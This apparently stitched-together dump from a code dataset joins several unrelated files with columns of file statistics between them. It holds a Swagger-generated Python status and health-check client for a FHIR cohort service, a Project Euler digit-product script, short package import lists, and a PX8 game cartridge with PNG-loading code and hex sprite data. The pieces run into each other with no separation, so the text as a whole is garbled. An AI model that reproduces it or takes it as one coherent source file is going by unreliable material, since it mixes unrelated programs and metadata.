OpenAPI spec version: 2.1.0 2022-02-18T21:50:45Z
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class StatusApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_health_check_status(self, **kwargs): # noqa: E501
"""Determine if service is running correctly # noqa: E501
This resource differs from /status in that it will will always return a 500 error if the service state is not OK. This makes it simpler for service front ends (such as Datapower) to detect a failed service. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_health_check_status(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str format: Override response format
:return: ServiceStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_health_check_status_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_health_check_status_with_http_info(**kwargs) # noqa: E501
return data
def get_health_check_status_with_http_info(self, **kwargs): # noqa: E501
"""Determine if service is running correctly # noqa: E501
This resource differs from /status in that it will will always return a 500 error if the service state is not OK. This makes it simpler for service front ends (such as Datapower) to detect a failed service. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_health_check_status_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str format: Override response format
:return: ServiceStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['format'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_health_check_status" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'format' in params:
query_params.append(('format', params['format'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1/status/health_check', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ServiceStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_service_status(self, **kwargs): # noqa: E501
"""Get status of service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service_status(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str format: Override response format
:param str liveness_check: Perform a shallow liveness check
:return: ServiceStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_service_status_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_service_status_with_http_info(**kwargs) # noqa: E501
return data
def get_service_status_with_http_info(self, **kwargs): # noqa: E501
"""Get status of service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service_status_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str format: Override response format
:param str liveness_check: Perform a shallow liveness check
:return: ServiceStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['format', 'liveness_check'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_service_status" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'format' in params:
query_params.append(('format', params['format'])) # noqa: E501
if 'liveness_check' in params:
query_params.append(('liveness_check', params['liveness_check'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ServiceStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def health_check_enhanced(self, version, fhir_server_connection_config, **kwargs): # noqa: E501
"""Get the status of the cohorting service and dependent downstream services # noqa: E501
Checks the status of the cohorting service and any downstream services used by the cohorting service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.health_check_enhanced(version, fhir_server_connection_config, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str version: The release date of the version of the API you want to use. Specify dates in YYYY-MM-DD format. (required)
:param file fhir_server_connection_config: A configuration file containing information needed to connect to the FHIR server. See https://github.com/Alvearie/quality-measure-and-cohort-service/blob/main/docs/user-guide/fhir-server-config.md for more details. <p>Example Contents: <pre>{ \"dataServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" }, \"terminologyServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" } }</pre></p> (required)
:return: EnhancedHealthCheckResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.health_check_enhanced_with_http_info(version, fhir_server_connection_config, **kwargs) # noqa: E501
else:
(data) = self.health_check_enhanced_with_http_info(version, fhir_server_connection_config, **kwargs) # noqa: E501
return data
def health_check_enhanced_with_http_info(self, version, fhir_server_connection_config, **kwargs): # noqa: E501
"""Get the status of the cohorting service and dependent downstream services # noqa: E501
Checks the status of the cohorting service and any downstream services used by the cohorting service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.health_check_enhanced_with_http_info(version, fhir_server_connection_config, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str version: The release date of the version of the API you want to use. Specify dates in YYYY-MM-DD format. (required)
:param file fhir_server_connection_config: A configuration file containing information needed to connect to the FHIR server. See https://github.com/Alvearie/quality-measure-and-cohort-service/blob/main/docs/user-guide/fhir-server-config.md for more details. <p>Example Contents: <pre>{ \"dataServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" }, \"terminologyServerConfig\": { \"@class\": \"com.ibm.cohort.fhir.client.config.IBMFhirServerConfig\", \"endpoint\": \"ENDPOINT\", \"user\": \"USER\", \"password\": \"PASSWORD\", \"logInfo\": [ \"REQUEST_SUMMARY\", \"RESPONSE_SUMMARY\" ], \"tenantId\": \"default\" } }</pre></p> (required)
:return: EnhancedHealthCheckResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['version', 'fhir_server_connection_config'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method health_check_enhanced" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'version' is set
if self.api_client.client_side_validation and ('version' not in params or
params['version'] is None): # noqa: E501
raise ValueError("Missing the required parameter `version` when calling `health_check_enhanced`") # noqa: E501
# verify the required parameter 'fhir_server_connection_config' is set
if self.api_client.client_side_validation and ('fhir_server_connection_config' not in params or
params['fhir_server_connection_config'] is None): # noqa: E501
raise ValueError("Missing the required parameter `fhir_server_connection_config` when calling `health_check_enhanced`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'version' in params:
query_params.append(('version', params['version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
if 'fhir_server_connection_config' in params:
local_var_files['fhir_server_connection_config'] = params['fhir_server_connection_config'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1/status/health_check_enhanced', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EnhancedHealthCheckResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 46.996951
| 1,021
| 0.621018
| 1,755
| 15,415
| 5.225071
| 0.136182
| 0.041876
| 0.034896
| 0.045365
| 0.903926
| 0.884188
| 0.87121
| 0.83795
| 0.834024
| 0.829335
| 0
| 0.015896
| 0.281739
| 15,415
| 327
| 1,022
| 47.140673
| 0.812319
| 0.439377
| 0
| 0.708333
| 1
| 0
| 0.187325
| 0.073196
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.02381
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
484bc65665590cbcb25bd216883d1a064a95570d
| 1,272
|
py
|
Python
|
8.py
|
gricey432/Euler
|
3bbdfc5dfe58df9a5b0217980d8951f00f53beed
|
[
"MIT"
] | null | null | null |
8.py
|
gricey432/Euler
|
3bbdfc5dfe58df9a5b0217980d8951f00f53beed
|
[
"MIT"
] | null | null | null |
8.py
|
gricey432/Euler
|
3bbdfc5dfe58df9a5b0217980d8951f00f53beed
|
[
"MIT"
] | null | null | null |
import operator
def str_product(iterable):
nums = [int(c) for c in iterable]
return reduce(operator.mul, nums, 1)
numbers = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
combos = [numbers[a:a+13] for a in range(len(numbers) - 12)]
products = [str_product(combo) for combo in combos]
print max(products)
| 97.846154
| 1,012
| 0.934748
| 44
| 1,272
| 26.977273
| 0.613636
| 0.016849
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.821078
| 0.037736
| 1,272
| 12
| 1,013
| 106
| 0.148693
| 0
| 0
| 0
| 0
| 0
| 0.786164
| 0.786164
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.125
| null | null | 0.125
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
485bd1595d99a78a6756bc76566aa7d2cf851708
| 110
|
py
|
Python
|
luvina/backend/backend.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
luvina/backend/backend.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
luvina/backend/backend.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
from .enchant_backend import *
from .nltk_backend import *
from .spacy_backend import *
from .common import *
| 22
| 30
| 0.781818
| 15
| 110
| 5.533333
| 0.466667
| 0.46988
| 0.614458
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145455
| 110
| 4
| 31
| 27.5
| 0.882979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4872f72df1a4000bb4bfea63b6cf52d3e678227c
| 192
|
py
|
Python
|
rubin_sim/scheduler/surveys/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/scheduler/surveys/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/scheduler/surveys/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
from .base_survey import *
from .surveys import *
from .dd_surveys import *
from .scripted_surveys import *
from .too_surveys import *
from .desc_ddf import *
from .plan_night_survey import *
| 24
| 32
| 0.78125
| 28
| 192
| 5.107143
| 0.428571
| 0.41958
| 0.475524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 192
| 7
| 33
| 27.428571
| 0.871951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4875428bbca4b69dfb60035060ebe43cbd598d4e
| 37,517
|
py
|
Python
|
demos/sprites/sprite1.py
|
rlugojr/PX8
|
b081611dde998a06910d57037ca20b5fbd90123b
|
[
"MIT"
] | 21
|
2019-05-31T17:15:54.000Z
|
2022-02-26T04:59:07.000Z
|
demos/sprites/sprite1.py
|
rlugojr/PX8
|
b081611dde998a06910d57037ca20b5fbd90123b
|
[
"MIT"
] | null | null | null |
demos/sprites/sprite1.py
|
rlugojr/PX8
|
b081611dde998a06910d57037ca20b5fbd90123b
|
[
"MIT"
] | 1
|
2020-06-11T14:57:11.000Z
|
2020-06-11T14:57:11.000Z
|
px8 / python cartridge
version 1
__python__
from PIL import Image
# Get a PNG and display it directly by adding the color
def _init():
cls()
im = Image.open("./demos/assets/Tux.png")
print(im)
pix = im.load()
width, height = im.size
print(width, height)
palettes = {}
idx = 16
for x in range(width):
for y in range(height):
v = pix[x, y][:-1]
if v not in palettes:
palettes[v] = idx
set_palette_color(idx, v[0], v[1], v[2])
idx += 1
pset(x, y, palettes[v])
def _update():
pass
def _draw():
pass
__gfx__
10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088088000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888887800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000888888800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000088888000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000008880000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000077007700777777007700000077000000777777000000000770007700777777007777770077000000777700000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770007700770077007700770077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000770707700770077007700770077000000770077000000000000000000000000000000000
00000000077777700777700007700000077000000770077000000000777777700770077007777000077000000770077000000000000000000000000000000000
00000000077007700770000007700000077000000770077000000000777077700770077007700770077000000770077000000000000000000000000000000000
00000000077007700777777007777770077777700777777000000000770007700777777007700770077777700777777000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__gff__
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__map__
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
